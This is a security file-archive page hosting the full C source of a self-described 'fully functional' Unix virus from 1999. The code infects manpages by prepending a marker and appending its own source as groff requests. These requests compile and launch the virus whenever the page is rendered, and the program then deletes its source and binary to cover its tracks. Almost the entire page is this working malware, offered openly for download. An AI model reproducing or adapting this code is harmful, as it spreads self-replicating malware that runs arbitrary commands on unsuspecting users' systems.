what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

unix_virus.c

unix_virus.c
Posted Sep 28, 1999

A fully functional unix virus that will infect your manpages when started

tags | exploit, virus
systems | unix
SHA-256 | 7a21d58433fa270c7e2dad8c566f8df79a0b4d09c4e1d0864c08a4f8b8dd1733

unix_virus.c

Change Mirror Download
/*** BE CAREFUL! THIS IS A FULL FUNCTIONALL VIRUS!
*** ABSOLUTELY NO WARRANTY! IT COMES UNDER THE GPL!
***/
#include <stdio.h>
#include <sys/types.h>
#include <dirent.h>
#include <stdlib.h>

const char *viriiSource = "/tmp/virus.c";
const char *tmpVictum = "/tmp/victum";
const char *ident = ".\x5c\x22VIRUS\x0a";
char path[] = "/usr/man/manx";
int wasZipped = 0;

char *findVictum();
int infectVictum(char *);

int main(int argc, char **argv)
{
infectVictum(findVictum());
unlink(viriiSource);
unlink(*argv);
}

char *findVictum()
{
DIR *dp;
FILE *fd;
struct dirent *de;
int index = 0;
char buf[1000];
static char pathname[1000];


/* inititialization */
memset(buf, 0, 1000);
memset(pathname, 0, 1000);
srand(time(NULL));
index = rand() % 3;
path[12] = index + 49;

if ((dp = opendir(path)) == NULL) {
return NULL;
}

/* skip "." and ".." */
readdir(dp); readdir(dp);

while (1) {
/* read next entry */
if ((de = readdir(dp)) == NULL) {
closedir(dp);
return NULL;
}
/* create full pathname */
sprintf(pathname, "%s/%s", path, de->d_name);

/* if zipped */
if (strstr(pathname, ".gz")) {
sprintf(buf, "gunzip %s", pathname);
system(buf);
wasZipped = 1;

/* without '.gz' */
pathname[strlen(pathname) - 3 ] = 0;
}


/* get next filename from directory */
if ((fd = fopen(pathname, "r")) == NULL) {
continue;
}
fgets(buf, 100, fd);

/* look if not already infected */
if (strcmp(buf, ident) == 0) {
fclose(fd);
memset(buf, 0, 1000);
memset(pathname, 0, 1000);
} else {
fclose(fd);
return pathname;
}
}
}

int infectVictum(char *victum)
{
char buf[1000];
FILE *virusIn, *victumIn, *tmpOut;

memset(buf, 0, 1000);

if ((virusIn = fopen(viriiSource, "r")) == NULL) {
return 1;
}

if ((tmpOut = fopen(tmpVictum, "a")) == NULL) {
fclose(virusIn);
return 1;
}
if ((victumIn = fopen(victum, "r")) == NULL) {
fclose(virusIn);
fclose(tmpOut);
unlink(tmpVictum);
}

/* write ident-string to man-page */
fprintf(tmpOut, "%s", ident);

/* and append the original man-page */
while (fgets(buf, 999, victumIn) != NULL) {
fprintf(tmpOut, "%s", buf);
memset(buf, 1000, 0);
}
fclose(victumIn);

/* finally append virus-code to it */
sprintf(buf, ".opena v %s\x0a", viriiSource);
fprintf(tmpOut, "%s", buf);
memset(buf, 0, 1000);

while (fgets(buf, 999, virusIn) != NULL) {
fprintf(tmpOut, ".write v %s", buf);
memset(buf, 0, 1000);
}
sprintf(buf, ".pso cc %s -o /tmp/virus;/tmp/virus &\x0a", viriiSource);
fprintf(tmpOut, "%s", buf);

fclose(virusIn);
fclose(tmpOut);

unlink(victum);

/* our smart-copy ;-) */
link(tmpVictum, victum);
unlink(tmpVictum);

if (wasZipped) {
sprintf(buf, "gzip %s", victum);
system(buf);
}
return 0;
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close